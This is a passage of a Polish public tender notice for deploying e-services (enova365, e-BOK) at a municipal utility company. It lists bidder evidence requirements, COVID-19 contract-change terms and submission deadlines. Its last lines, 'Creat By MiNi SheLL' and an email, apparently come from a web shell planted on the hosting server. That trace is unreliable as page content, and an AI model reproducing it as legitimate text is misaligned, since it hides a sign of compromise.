<span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu <br/> dotyczących zdolności technicznej Wykonawca zobowiązany jest do złożenia podmiotowych środków dowodowych:<br/>a) wykaz realizacji usług wdrożenia co najmniej dwóch instalacji systemu informatycznego enova365 określonych w punkcie 6.4. pkt. 1) SWZ;<br/>b) załączyć dowody określające, czy te usługi zostały wykonane należycie, tj.:<br/>- referencje,<br/>- inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy;<br/>c) wykaz realizacji usług wdrożenia co najmniej jednej instalacji e-BOK polegających przede wszystkim na elektronicznej obsłudze klientów, określonych w punkcie 6.4. pkt. 2) SWZ ;<br/>d) załączyć dowody określające, czy te usługi zostały wykonane należycie, tj.:<br/>- referencje,<br/>- inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/><br/>W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia (warunek zdolności zawodowej) Wykonawca zobowiązany jest:<br/>a) złożyć wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności,<br/>b) podać informację o podstawie dysponowania osobami ujętymi w wykazie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie precyzuje przedmiotowego środka dowodowego <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dołączają oni do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>2) jeżeli Wykonawca zamierza powierzyć część zamówienia Podwykonawcom, Zamawiający żąda od Wykonawcy<br/>przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 8.1.2.a),b) SWZ dotyczących<br/>podwykonawców niebędących podmiotami udostępniającymi zasoby, potwierdzających, że nie zachodzą wobec tych<br/>Podwykonawców podstawy wykluczenia z postępowania.<br/>3) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby przedstawienia podmiotowych środków dowodowych, o których<br/>mowa w pkt 8.1.2 lit. a),b), SWZ dotyczących tych podmiotów potwierdzających, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.<br/>4) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczpospolitej Polskiej,<br/>składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że:<br/>a) nie naruszył obowiązków dotyczących płatności podatków opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne,<br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>e) pełnomocnictwo do podpisania oferty – jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu z postępowania i spełnianiu warunków udziału w postępowaniu, składa<br/>każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Zamawiający żąda od Wykonawców wspólnie ubiegających się o zamówienie, aby przed zawarciem umowy w sprawie<br/>zamówienia, złożyli kopię umowy regulującej współpracę tych Wykonawców.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony umowy w sprawie zamówienia niezwłocznie, wzajemnie informują się o wpływie okoliczności związanych z<br/>wystąpieniem zachorowań na COVID-19 na należyte wykonanie tej umowy, o ile taki wpływ wystąpił lub może<br/>wystąpić. Strony umowy potwierdzają ten wpływ dołączając do informacji, o której mowa w zdaniu pierwszym,<br/>oświadczenia lub dokumenty, które mogą dotyczyć w szczególności:<br/>1) nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie niż stosunek<br/>pracy, które uczestniczą lub mogłyby uczestniczyć w realizacji zamówienia;<br/>2) decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego<br/>wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem COVID-19, nakładających na wykonawcę<br/>obowiązek podjęcia określonych czynności zapobiegawczych lub kontrolnych;<br/>3) poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady<br/>Ministrów, związanych z przeciwdziałaniem COVID-19<br/>4) wstrzymania dostaw produktów, komponentów produktu lub materiałów, trudności<br/>w dostępie do sprzętu lub trudności w realizacji usług transportowych;<br/>5) innych okoliczności, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość wykonania umowy<br/>2. Każda ze stron umowy, o której mowa w ust. 1, może żądać przedstawienia dodatkowych oświadczeń lub<br/>dokumentów potwierdzających wpływ okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie tej<br/>umowy.<br/>3. Strona umowy, o której mowa w ust. 1, na podstawie otrzymanych oświadczeń lub dokumentów, o których mowa w<br/>ust. 1 i 2, w terminie 14 dni od dnia ich otrzymania, przekazuje drugiej stronie swoje stanowisko, wraz z<br/>uzasadnieniem, odnośnie do wpływu okoliczności, o których mowa w ust. 1, na należyte jej wykonanie. Jeżeli strona<br/>umowy otrzymała kolejne oświadczenia lub dokumenty, termin liczony jest od dnia ich otrzymania.<br/>4. Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których mowa w ust. 1, mogą<br/>wpłynąć lub wpływają na należyte wykonanie umowy, o której mowa w ust. 1, może w uzgodnieniu z Wykonawcą dokonać zmiany umowy, w szczególności przez:<br/>1) zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy lub jej części;<br/>2) zmianę sposobu wykonywania usługi;<br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia<br/>wynagrodzenia wykonawcy – o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50%<br/>wartości pierwotnej umowy;<br/>5. Strona umowy, o której mowa w ust. 1, w stanowisku, o którym mowa w ust. 3, przedstawia wpływ okoliczności<br/>związanych z wystąpieniem COVID-19 na należyte jej wykonanie oraz wpływ okoliczności związanych z wystąpieniem<br/>COVID-19, na zasadność ustalenia i dochodzenia tych kar lub odszkodowań, lub ich wysokość.<br/>6. Wykonawca, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, mogą wpłynąć lub wpływają na<br/>należyte wykonanie łączącej ich umowy, która jest związana z wykonaniem zamówienia lub jego części, uzgadniają<br/>odpowiednią zmianę tej umowy, w szczególności mogą zmienić termin wykonania umowy lub jej części, czasowo<br/>zawiesić wykonywanie umowy lub jej części, zmienić sposób wykonywania umowy lub zmienić zakres wzajemnych<br/>świadczeń. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi oświadczeniami i dokumentami należy złożyć na Platformie zakupowej – link do postępowania https://platformazakupowa.pl/transakcja/522529 w zakładce postępowania pod nazwą: Wdrożenie e-usług publicznych w ZGK Sp. z o.o. w Kątach Wrocławskich w ramach RPO Woj. Dolnośl. 2014-2020 współf. ze śr. UE, EFRR NR NABORU: RPDS.02.01.02-IZ.00-02-409/20 PO RPDS: RPO WD 2014-2020</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-29 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com